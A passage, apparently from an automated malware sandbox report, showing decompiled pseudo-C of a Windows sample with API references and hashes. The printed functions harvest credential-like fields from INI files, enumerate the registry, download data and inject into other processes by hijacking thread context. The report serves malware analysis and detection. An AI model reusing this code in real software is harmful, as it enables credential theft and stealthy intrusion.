						} while (RegEnumKeyExW(_v12, _v28,  &_v804,  &_v8, 0, 0, 0, 0) == 0);
						_t134 = 0;
						goto L21;
						L22:
						_v16 = _v16 + 1;
					} while (_v16 < 2);
					E00406E85(_v24);
					if(_v32 <= _t134) {
						return E00406E85(_v36);
					}
					return E00416CBC(0x307, _v36, 0xcb);
				}
			}

0x00418da5
0x00418db6
0x00418dbb
0x00418dbd
0x00418dbf
0x00418dc4
0x0041901d
0x00418dca
0x00418dd5
0x00418dda
0x00418de5
0x00418df0
0x00418df7
0x00418dff
0x00418e0c
0x00418e19
0x00418e26
0x00418e2b
0x00418e33
0x00418e38
0x00418e3e
0x00418e41
0x00418e49
0x00418e64
0x00000000
0x00000000
0x00418e7d
0x00418e80
0x00418e8f
0x00418fda
0x00418fdd
0x00000000
0x00000000
0x00000000
0x00000000
0x00418e95
0x00418e95
0x00418e95
0x00418e98
0x00418eaa
0x00418eaf
0x00418eb2
0x00418eb7
0x00418ed4
0x00418eda
0x00418edf
0x00418ee4
0x00418ef9
0x00418efe
0x00418f03
0x00000000
0x00000000
0x00000000
0x00000000
0x00418f11
0x00418f11
0x00418f11
0x00418f1c
0x00418f24
0x00418f2f
0x00418f44
0x00418f31
0x00418f35
0x00418f3d
0x00418f3d
0x00418f46
0x00418f4c
0x00418f52
0x00418f5c
0x00418f60
0x00418f66
0x00418f67
0x00418f6c
0x00418f6f
0x00418f70
0x00418f72
0x00418f78
0x00418f81
0x00418f87
0x00418f8c
0x00418f91
0x00418f9d
0x00418fa7
0x00418fa9
0x00418fa9
0x00418fa7
0x00418f91
0x00418f5c
0x00000000
0x00418f4c
0x00418ee4
0x00418fac
0x00418fc0
0x00418fd0
0x00418fd8
0x00000000
0x00418fe3
0x00418fe3
0x00418fe6
0x00418ff3
0x00418ffb
0x00000000
0x00419014
0x00000000
0x0041900a

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 00418E5C
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 00418E87
RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 00418FDD

Part of subcall function 0040AFA9: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00413CB1,?,?,00000104,.exe,00000000), ref: 0040AFBE

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 00418FCA

Part of subcall function 0040AFA9: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00413CB1,?,?,00000104), ref: 0040B03F

RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF,?,00000000), ref: 00418F27

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: 6d28c9fed770babdeb51da01369116c3626a732551c3723bd645e67b585133f4
Instruction ID: 8c38dc6d86e57e2ea038a5814cb647bf467c864863428e510fbcf049abf8ac87
Opcode Fuzzy Hash: 6d28c9fed770babdeb51da01369116c3626a732551c3723bd645e67b585133f4
Instruction Fuzzy Hash: F4711AB1900219ABDB10EBE5CD45BEFB7BDEB48304F54407AB505F3291DB38AA85CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00417E6B, Relevance: 7.7, APIs: 5, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00417E6B(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				char _v564;
				short _v576;
				short _v588;
				short _v600;
				short _v608;
				WCHAR* _v612;
				WCHAR* _v616;
				WCHAR* _v620;
				WCHAR* _v624;
				WCHAR* _v628;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t51;
				WCHAR* _t54;
				WCHAR* _t56;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t63;
				long _t67;
				WCHAR* _t69;
				long _t77;
				long _t80;
				WCHAR* _t82;
				void* _t83;
				WCHAR* _t86;
				WCHAR* _t87;
				short* _t92;
				WCHAR* _t93;
				int _t102;
				WCHAR* _t107;
				intOrPtr _t114;
				signed int _t115;
				void* _t117;

				_t117 = (_t115 & 0xfffffff8) - 0x26c;
				if(E0040C70A( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L19:
					return 1;
				}
				_t120 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t107 = E00406E55(0x1fffe);
					_v612 = _t107;
					__eflags = _t107;
					if(_t107 == 0) {
						goto L19;
					}
					_t51 = GetPrivateProfileStringW(0, 0, 0, _t107, 0xffff,  &_v524);
					__eflags = _t51;
					if(_t51 == 0) {
						L18:
						E00406E85(_t107);
						goto L19;
					}
					_t9 =  &(_t51[0]); // 0x1
					_t54 = E00407D35(_t107, _t9);
					__eflags = _t54;
					if(_t54 == 0) {
						goto L18;
					}
					_t56 = E00406E55(0xc1c);
					_v620 = _t56;
					__eflags = _t56;
					if(_t56 != 0) {
						_t11 =  &(_t56[0xff]); // 0x1fe
						_t92 = _t11;
						_v624 = _t107;
						_v616 = _t92;
						_t57 = 0x5c;
						_t93 =  &(_t92[0xff]);
						__eflags = _t93;
						E00405B00(_t57,  &_v608);
						_t59 = 0x5d;
						E00405B00(_t59,  &_v588);
						_t61 = 0x5e;
						E00405B00(_t61,  &_v576);
						_t63 = 0x5f;
						E00405B00(_t63,  &_v600);
						do {
							_t67 = GetPrivateProfileStringW(_v624,  &_v608, 0, _v620, 0xff,  &_v524);
							__eflags = _t67;
							if(_t67 != 0) {
								_t102 = GetPrivateProfileIntW(_v624,  &_v588, 0x15,  &_v524);
								_t25 = _t102 - 1; // -1
								__eflags = _t25 - 0xfffe;
								if(_t25 <= 0xfffe) {
									_t77 = GetPrivateProfileStringW(_v624,  &_v576, 0, _v616, 0xff,  &_v524);
									__eflags = _t77;
									if(_t77 != 0) {
										_t80 = GetPrivateProfileStringW(_v624,  &_v600, 0, _t93, 0xff,  &_v524);
										__eflags = _t80;
										if(_t80 != 0) {
											_t82 = E00417D5E(_v624, _t93);
											__eflags = _t82;
											if(_t82 > 0) {
												_t113 =  &_v564;
												_t83 = 0x55;
												E00405B00(_t83,  &_v564);
												_push(_t102);
												_push(_v620);
												_push(_t93);
												_push(_v616);
												_t37 =  &(_t93[0xff]); // 0x1fe
												_t103 = _t37;
												_t86 = E00407B78(_t113, 0x311, _t37, _t113);
												_t117 = _t117 + 0x14;
												__eflags = _t86;
												if(_t86 > 0) {
													_t114 = _a4;
													_t87 = E00407279(_t86, _t114, _t103);
													__eflags = _t87;
													if(_t87 != 0) {
														_t39 = _t114 + 4;
														 *_t39 =  &(( *(_t114 + 4))[0]);
														__eflags =  *_t39;
													}
												}
											}
										}
									}
								}
							}
							_t69 = E00407D71(_v624, 1);
							_v628 = _t69;
							__eflags = _t69;
						} while (_t69 != 0);
						E00406E85(_v620);
						_t107 = _v616;
					}
					goto L18;
				} else {
					E00417E11(_t120,  &_v524, _a4);
					goto L19;
				}
			}

0x00417e71
0x00417e8c
0x0041804e
0x00418056
0x00418056
0x00417e92
0x00417e95
0x00417eb3
0x00417eb5
0x00417eb9
0x00417ebb
0x00000000
0x00000000
0x00417ed2
0x00417ed8
0x00417eda
0x00418048
0x00418049
0x00000000
0x00418049
0x00417ee0
0x00417ee5
0x00417eea
0x00417eec
0x00000000
0x00000000
0x00417ef7
0x00417efc
0x00417f00
0x00417f02
0x00417f08
0x00417f08
0x00417f10
0x00417f14
0x00417f1c
0x00417f1d
0x00417f1d
0x00417f23
0x00417f2e
0x00417f2f
0x00417f3a
0x00417f3b
0x00417f46
0x00417f47
0x00417f4c
0x00417f66
0x00417f6c
0x00417f6e
0x00417f8a
0x00417f8c
0x00417f8f
0x00417f94
0x00417faf
0x00417fb5
0x00417fb7
0x00417fcb
0x00417fd1
0x00417fd3
0x00417fd9
0x00417fde
0x00417fe0
0x00417fe4
0x00417fe8
0x00417fe9
0x00417fee
0x00417fef
0x00417ff5
0x00417ff6
0x00418000
0x00418000
0x00418006
0x0041800b
0x0041800e
0x00418010
0x00418012
0x00418018
0x0041801d
0x0041801f
0x00418021
0x00418021
0x00418021
0x00418021
0x0041801f
0x00418010
0x00417fe0
0x00417fd3
0x00417fb7
0x00417f94
0x0041802a
0x0041802f
0x00418033
0x00418033
0x0041803f
0x00418044
0x00418044
0x00000000
0x00417e97
0x00417e9f
0x00000000
0x00417e9f

APIs

Part of subcall function 0040C70A: PathCombineW.SHLWAPI(?,)A,?,00412909,?,?), ref: 0040C729

GetPrivateProfileStringW.KERNEL32 ref: 00417ED2
GetPrivateProfileStringW.KERNEL32 ref: 00417F66
GetPrivateProfileIntW.KERNEL32 ref: 00417F84
GetPrivateProfileStringW.KERNEL32 ref: 00417FAF
GetPrivateProfileStringW.KERNEL32 ref: 00417FCB

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$String$CombinePath
String ID:
API String ID: 2134968610-0
Opcode ID: 4336fb5bd58419549db3eb1caa252f59f06bc7905f945503935a5d62f324d4ee
Instruction ID: a15c65415564a921c25f8c28eb10dff0467936983c03a899b6d0b8fb2c294527
Opcode Fuzzy Hash: 4336fb5bd58419549db3eb1caa252f59f06bc7905f945503935a5d62f324d4ee
Instruction Fuzzy Hash: D451D131508705ABD710EF21CC40FAB7BE8EF48744F41093EBA44A71A1DB79E949CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0040CCEE, Relevance: 7.6, APIs: 5, Instructions: 111
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040CCEE(void* __ecx, signed int __edx, void** __esi, long _a4) {
				char _v5;
				void _v16;
				struct _OVERLAPPED* _v24;
				struct _OVERLAPPED* _v28;
				signed int _v32;
				signed int _v36;
				void* _t29;
				signed int _t31;
				int _t38;
				int _t39;
				signed int _t41;
				int _t42;
				int _t45;
				intOrPtr _t48;
				void* _t49;
				signed int _t53;
				struct _OVERLAPPED* _t54;
				void** _t56;

				_t56 = __esi;
				_t53 = __edx;
				_t49 = __ecx;
				_t54 = 0;
				_v5 = 0;
				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0);
				 *__esi = _t29;
				if(_t29 != 0xffffffff) {
					_t31 = E0040C1B9(_t49, _t29);
					_v36 = _t31;
					_v32 = _t53;
					if((_t31 & _t53) == 0xffffffff) {
						L4:
						CloseHandle( *_t56);
						 *_t56 =  *_t56 | 0xffffffff;
					} else {
						if((_t31 | _t53) == 0) {
							L18:
							_t56[2] = _t56[2] | 0xffffffff;
							_t25 =  &(_t56[3]);
							 *_t25 = _t56[3] | 0xffffffff;
							__eflags =  *_t25;
							_v5 = 1;
							E0040C169( *_t56, _t54, _t54, _t54);
						} else {
							_v28 = 0;
							_v24 = 0;
							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
								while(1) {
									__eflags = _a4 - _t54;
									if(_a4 == _t54) {
										goto L18;
									}
									__eflags = _a4 - 5;
									if(_a4 != 5) {
										L16:
										_t38 = E0040C169( *_t56, _v28, _v24, _t54);
										__eflags = _t38;
										if(_t38 == 0) {
											goto L4;
										} else {
											_t39 = SetEndOfFile( *_t56);
											__eflags = _t39;
											if(_t39 == 0) {
												goto L4;
											} else {
												goto L18;
											}
										}
									} else {
										_t41 = _v16 ^ _t56[4];
										asm("adc edi, [ebp-0x14]");
										_t48 = _t41 + _v28 + 5;
										asm("adc edi, ecx");
										_v16 = _t41;
										__eflags = 0 - _v32;
										if(__eflags > 0) {
											L15:
											_t54 = 0;
											__eflags = 0;
											goto L16;
										} else {
											if(__eflags < 0) {
												L11:
												__eflags = _t41 - 0xa00000;
												if(_t41 > 0xa00000) {
													goto L15;
												} else {
													_t42 = E0040C169( *_t56, _t41, 0, 1);
													__eflags = _t42;
													if(_t42 == 0) {
														goto L4;
													} else {
														_v28 = _t48;
														_v24 = 0;
														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
														__eflags = _t45;
														if(_t45 != 0) {
															_t54 = 0;
															__eflags = 0;
															continue;
														} else {
															goto L4;
														}
													}
												}
											} else {
												__eflags = _t48 - _v36;
												if(_t48 > _v36) {
													goto L15;
												} else {
													goto L11;
												}
											}
										}
									}
									goto L19;
								}
								goto L18;
							} else {
								goto L4;
							}
						}
					}
				}
				L19:
				return _v5;
			}

0x0040ccee
0x0040ccee
0x0040ccee
0x0040ccf6
0x0040cd0b
0x0040cd0f
0x0040cd15
0x0040cd1a
0x0040cd21
0x0040cd2a
0x0040cd2d
0x0040cd33
0x0040cd5a
0x0040cd5c
0x0040cd62
0x0040cd35
0x0040cd37
0x0040cdff
0x0040cdff
0x0040ce03
0x0040ce03
0x0040ce03
0x0040ce0c
0x0040ce10
0x0040cd3d
0x0040cd4a
0x0040cd4d
0x0040cd58
0x0040cd6c
0x0040cd6c
0x0040cd6f
0x00000000
0x00000000
0x0040cd75
0x0040cd79
0x0040cdd9
0x0040cde2
0x0040cde7
0x0040cde9
0x00000000
0x0040cdef
0x0040cdf1
0x0040cdf7
0x0040cdf9
0x00000000
0x00000000
0x00000000
0x00000000
0x0040cdf9
0x0040cd7b
0x0040cd7e
0x0040cd8a
0x0040cd8d
0x0040cd90
0x0040cd92
0x0040cd95
0x0040cd98
0x0040cdd7
0x0040cdd7
0x0040cdd7
0x00000000
0x0040cd9a
0x0040cd9a
0x0040cda1
0x0040cda1
0x0040cda6
0x00000000
0x0040cda8
0x0040cdae
0x0040cdb3
0x0040cdb5
0x00000000
0x0040cdb7
0x0040cdc5
0x0040cdc8
0x0040cdcb
0x0040cdd1
0x0040cdd3
0x0040cd6a
0x0040cd6a
0x00000000
0x0040cdd5
0x00000000
0x0040cdd5
0x0040cdd3
0x0040cdb5
0x0040cd9c
0x0040cd9c
0x0040cd9f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040cd9f
0x0040cd9a
0x0040cd98
0x00000000
0x0040cd79
0x00000000
0x00000000
0x00000000
0x00000000
0x0040cd58
0x0040cd37
0x0040cd33
0x0040ce15
0x0040ce1b

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000,00000000,00000000), ref: 0040CD0F

Part of subcall function 0040C1B9: GetFileSizeEx.KERNEL32(0040CD26,0040CD26,?,?,?,0040CD26,00000000), ref: 0040C1C5

ReadFile.KERNEL32(?,?,00000005,00000000,00000000,00000000), ref: 0040CD50
CloseHandle.KERNEL32(?,00000000), ref: 0040CD5C
ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001), ref: 0040CDCB
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 0040CDF1

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Read$CloseCreateHandleSize
String ID:
API String ID: 1850650832-0
Opcode ID: 13c9f67765ce5d68ff82a39f65561e31c03f35b861f1c4acd1a9debcf7f1054c
Instruction ID: 6d0b48b85d44bad2fdff54eaad848fc58d0cdb72ae7ebe4eb91a5110f2a4b2d6
Opcode Fuzzy Hash: 13c9f67765ce5d68ff82a39f65561e31c03f35b861f1c4acd1a9debcf7f1054c
Instruction Fuzzy Hash: 05418E30900245EADB209FA5CC85BAFBFB5EF88710F14433AE695B62E0D7394941DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040D423, Relevance: 7.6, APIs: 5, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040D423(void* __ecx, signed int __edx, void* __eflags, struct HDC__* _a4, BITMAPINFO** _a8, void** _a12, void* _a16, long _a20, void* _a24) {
				int _v8;
				void* _t37;
				long _t38;
				struct HBITMAP__* _t46;
				void* _t47;
				signed int _t56;
				signed int _t57;
				BITMAPINFO** _t62;
				BITMAPINFO* _t64;

				_t57 = __edx;
				_v8 = 0;
				_t64 = E00406E55(0x428);
				if(_t64 == 0) {
					L14:
					if(_a24 != 0) {
						DeleteObject(_a24);
					}
					L16:
					return _v8;
				}
				_t64->bmiHeader = 0x28;
				if(GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0 || GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0) {
					L13:
					E00406E85(_t64);
					goto L14;
				} else {
					DeleteObject(_a24);
					asm("cdq");
					_t56 =  ~((_t64->bmiHeader.biHeight ^ __edx) - __edx);
					_t37 = (_t64->bmiHeader.biBitCount & 0x0000ffff) - 1;
					_a24 = 0;
					_t64->bmiHeader.biHeight = _t56;
					if(_t37 == 0) {
						L7:
						_t64->bmiHeader.biClrUsed = 0;
						_push(8);
						_t64->bmiHeader.biClrImportant = 0;
						L8:
						_pop(_t38);
						_t64->bmiHeader.biBitCount = _t38;
						L9:
						_t62 = _a8;
						asm("cdq");
						_t58 = _t57 & 0x00000007;
						asm("cdq");
						_t64->bmiHeader.biSizeImage = ((_t64->bmiHeader.biBitCount & 0x0000ffff) * _t64->bmiHeader.biWidth * _t56 + (_t57 & 0x00000007) >> 0x00000003 ^ _t58) - _t58;
						_t64->bmiHeader.biCompression = 0;
						if(_t62 != 0) {
							 *_t62 = _t64;
						}
						_t46 = CreateDIBSection(_a4, _t64, 0, _a12, _a16, _a20);
						_v8 = _t46;
						if(_t46 == 0 || _t62 == 0) {
							goto L13;
						} else {
							goto L16;
						}
					}
					_t47 = _t37 - 3;
					if(_t47 == 0) {
						goto L7;
					}
					if(_t47 != 0x14) {
						goto L9;
					}
					_push(0x20);
					goto L8;
				}
			}

0x0040d423
0x0040d431
0x0040d439
0x0040d43d
0x0040d505
0x0040d508
0x0040d50d
0x0040d50d
0x0040d513
0x0040d51a
0x0040d51a
0x0040d452
0x0040d45f
0x0040d4ff
0x0040d500
0x00000000
0x0040d47b
0x0040d47e
0x0040d487
0x0040d492
0x0040d494
0x0040d495
0x0040d498
0x0040d49b
0x0040d4ab
0x0040d4ab
0x0040d4ae
0x0040d4b0
0x0040d4b3
0x0040d4b3
0x0040d4b4
0x0040d4b8
0x0040d4c0
0x0040d4c6
0x0040d4c7
0x0040d4cf
0x0040d4d4
0x0040d4d7
0x0040d4dc
0x0040d4de
0x0040d4de
0x0040d4ee
0x0040d4f4
0x0040d4f9
0x00000000
0x00000000
0x00000000
0x00000000
0x0040d4f9
0x0040d49d
0x0040d4a0
0x00000000
0x00000000
0x0040d4a5
0x00000000
0x00000000
0x0040d4a7
0x00000000
0x0040d4a7

APIs

GetDIBits.GDI32(00000000,0040D711,00000000,00000001,00000000,00000000,00000000), ref: 0040D45B
GetDIBits.GDI32(00000000,0040D711,00000000,00000001,00000000,00000000,00000000), ref: 0040D471
DeleteObject.GDI32(0040D711), ref: 0040D47E
CreateDIBSection.GDI32(00000000,00000000,00000000,004231D8,?,?), ref: 0040D4EE
DeleteObject.GDI32(0040D711), ref: 0040D50D

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: BitsDeleteObject$CreateSection
String ID:
API String ID: 1423349713-0
Opcode ID: e0704529bcbd1fdce6b7fae970e4add1ba2fe777b9e6b907139489dffc09a713
Instruction ID: 5dbe20091d5876fd5d7931545975f98160f3023c1dd6b4644c1f2d6d08638db6
Opcode Fuzzy Hash: e0704529bcbd1fdce6b7fae970e4add1ba2fe777b9e6b907139489dffc09a713
Instruction Fuzzy Hash: 2931D67650020ABFDF209F65CD84A6B7AE9EF48344B04843FF945E62A0C739ED54DB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041C508, Relevance: 7.6, APIs: 5, Instructions: 94
networkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041C508(intOrPtr* __edi, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
				intOrPtr _v28;
				signed int _v44;
				char _v52;
				intOrPtr _v56;
				char _v61;
				intOrPtr _v64;
				signed int _v72;
				intOrPtr _v76;
				char _v77;
				intOrPtr _v84;
				intOrPtr _v85;
				char _v89;
				void* __esi;
				char _t31;
				intOrPtr _t32;
				char* _t37;
				intOrPtr _t44;
				intOrPtr* _t58;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr _t65;

				_t63 = __edi;
				ResetEvent(_a8);
				_t31 = E00406E55(0x1000);
				_t65 = 0;
				_v52 = _t31;
				if(_t31 != 0) {
					_t58 = __imp__InternetSetStatusCallbackW;
					_t32 =  *_t58(_a4, E0041C4BF);
					_t62 = 0x28;
					_v56 = _t32;
					 *_a12 = 0;
					 *__edi = 0;
					_v61 = 1;
					E00406F38( &_v52,  &_v52, 0, _t62);
					_v64 = _t62;
					_v44 = _v72;
					while(1) {
						L3:
						_t37 =  &_v52;
						_v28 = 0x1000;
						__imp__InternetReadFileExA(_a4, _t37, 8, _t65);
						if(_t37 == 0) {
							break;
						}
						if(_v44 != _t65) {
							_t67 = _a12;
							if(E00406E10( *_t63 + _v44, _a12) == 0) {
								L9:
								_v77 = 0;
							} else {
								E00406EC1( *_t67 +  *_t63, _v76, _v44);
								 *_t63 =  *_t63 + _v56;
								_t65 = 0;
								continue;
							}
						}
						L10:
						asm("sbb eax, eax");
						 *_t58(_a4,  ~(_v72 + 1) & _v72);
						E00406E85(_v84);
						if(_v89 == 0) {
							E00406E85( *_a12);
						}
						_t44 = _v85;
						goto L13;
					}
					if(GetLastError() != 0x3e5) {
						goto L9;
					} else {
						E0040A5F2( &_a8);
						goto L3;
					}
					goto L10;
				} else {
					E00406E85(0);
					_t44 = 0;
				}
				L13:
				return _t44;
			}

0x0041c508
0x0041c516
0x0041c521
0x0041c526
0x0041c528
0x0041c52e
0x0041c53d
0x0041c54b
0x0041c54f
0x0041c550
0x0041c558
0x0041c560
0x0041c562
0x0041c567
0x0041c570
0x0041c574
0x0041c578
0x0041c578
0x0041c57b
0x0041c583
0x0041c58b
0x0041c593
0x00000000
0x00000000
0x0041c5b1
0x0041c5b9
0x0041c5c3
0x0041c5e3
0x0041c5e3
0x0041c5c5
0x0041c5d4
0x0041c5dd
0x0041c5df
0x00000000
0x0041c5df
0x0041c5c3
0x0041c5e8
0x0041c5ef
0x0041c5f9
0x0041c5ff
0x0041c609
0x0041c610
0x0041c610
0x0041c615
0x00000000
0x0041c615
0x0041c5a0
0x00000000
0x0041c5a2
0x0041c5a6
0x00000000
0x0041c5a6
0x00000000
0x0041c530
0x0041c531
0x0041c536
0x0041c536
0x0041c619
0x0041c61e

APIs

ResetEvent.KERNEL32(?), ref: 0041C516
InternetSetStatusCallbackW.WININET(?,0041C4BF), ref: 0041C54B
InternetReadFileExA.WININET ref: 0041C58B
GetLastError.KERNEL32 ref: 0041C595
InternetSetStatusCallbackW.WININET(?,?), ref: 0041C5F9

Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CallbackStatus$ErrorEventFileFreeHeapLastReadReset
String ID:
API String ID: 4044253124-0
Opcode ID: b0236476650b5e352073ad7cf27ddb42baba888b1a08b4e03a7c5d3e7b92595a
Instruction ID: ccae93639ff710772ea2cc8870d90515db3e89606470bf99454a03de376c0477
Opcode Fuzzy Hash: b0236476650b5e352073ad7cf27ddb42baba888b1a08b4e03a7c5d3e7b92595a
Instruction Fuzzy Hash: F1317E71148351AFCB01DF65CC80A9EBBE9FF49744F00492AF885E7261D738D9A4CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00413DA3, Relevance: 7.6, APIs: 5, Instructions: 83
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00413DA3(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
				struct _CONTEXT _v720;
				void* __edi;
				void* __esi;
				intOrPtr _t32;
				void* _t36;
				void* _t37;
				void** _t45;
				void* _t46;
				void* _t47;
				void** _t50;
				void* _t52;
				void* _t53;
				signed int _t55;

				_t47 = __edx;
				_t45 = _a4;
				_t32 =  *0x42398c(_t45, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
				_a40 = _t32;
				if(_t32 >= 0 && (_a32 & 0x00000001) != 0 && _t45 != 0 && _a8 != 0 && E00412FEE() != 0 && GetProcessId( *_t45) != 0) {
					_t36 = E00412E11(_t46, _t47, _t35);
					_a44 = _t36;
					_t63 = _t36;
					if(_t36 != 0) {
						_push(_t52);
						_t37 = E00412F03(_t46,  *_t45, _t52, _t63, _t36, 0);
						_t50 = _a8;
						_t53 = _t37;
						_a32 = _t53;
						_t55 = _t53 -  *0x42397c + E00413670;
						_v720.ContextFlags = 0x10003;
						if(GetThreadContext( *_t50,  &_v720) == 0 || _v720.Eip !=  *0x423994) {
							L12:
							VirtualFreeEx( *_t45, _a32, 0, 0x8000);
						} else {
							if(( *0x423968 & 0x00000010) != 0) {
								_t55 = _t55 ^ _v720.Eax;
							}
							_v720.Eax = _t55;
							_v720.ContextFlags = 0x10002;
							if(SetThreadContext( *_t50,  &_v720) == 0) {
								goto L12;
							}
						}
						CloseHandle(_a44);
					}
				}
				return _a40;
			}

0x00413da3
0x00413db0
0x00413dcf
0x00413dd5
0x00413dda
0x00413e1a
0x00413e1f
0x00413e22
0x00413e24
0x00413e2a
0x00413e31
0x00413e36
0x00413e39
0x00413e41
0x00413e4d
0x00413e53
0x00413e65
0x00413ea7
0x00413eb3
0x00413e75
0x00413e7c
0x00413e7e
0x00413e7e
0x00413e8d
0x00413e93
0x00413ea5
0x00000000
0x00000000
0x00413ea5
0x00413ebc
0x00413ec3
0x00413e24
0x00413ec9

APIs

Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6

GetProcessId.KERNEL32(?), ref: 00413E0B

Part of subcall function 00412E11: CreateMutexW.KERNEL32(004239A0,00000001,?,00423BE0,74B5F560,?,00000002,?,74B5F560), ref: 00412E62
Part of subcall function 00412E11: GetLastError.KERNEL32 ref: 00412E6E
Part of subcall function 00412E11: CloseHandle.KERNEL32(00000000), ref: 00412E7C

GetThreadContext.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 00413E5D
SetThreadContext.KERNEL32(00000000,00010003,?,?,00000000), ref: 00413E9D
VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000,?,?,00000000), ref: 00413EB3
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00413EBC

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseContextHandleThread$CreateErrorFreeLastMutexObjectProcessSingleVirtualWait
String ID:
API String ID: 3998962940-0
Opcode ID: c688fc29bee2bd29f1679afc3207a1f7ff2db475b2f8fab26af26bc7ac9a08bf
Instruction ID: 85020feb429ce340af31386fb28ad7abc7f316497f4c529dbb66f18782a47491
Opcode Fuzzy Hash: c688fc29bee2bd29f1679afc3207a1f7ff2db475b2f8fab26af26bc7ac9a08bf
Instruction Fuzzy Hash: 0A311A31501219ABDF129F65CD48BDE7BB9AF0870AF004066FE08A62A0D379DDA5DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004059F6, Relevance: 7.6, APIs: 5, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004059F6(struct HWND__* __ecx, intOrPtr* __edx) {
				struct tagRECT _v24;
				char _v28;
				struct HWND__* _v32;
				intOrPtr _v36;
				struct HWND__* _v40;
				void* __edi;
				intOrPtr _t29;
				signed int _t30;
				RECT* _t52;
				signed int _t54;
				intOrPtr* _t61;

				_t55 = __edx;
				_t61 = __edx;
				 *( *(__edx + 0x14)) = 0x3c;
				_v32 = __ecx;
				if(GetWindowInfo(__ecx,  *(__edx + 0x14)) == 0) {
					L12:
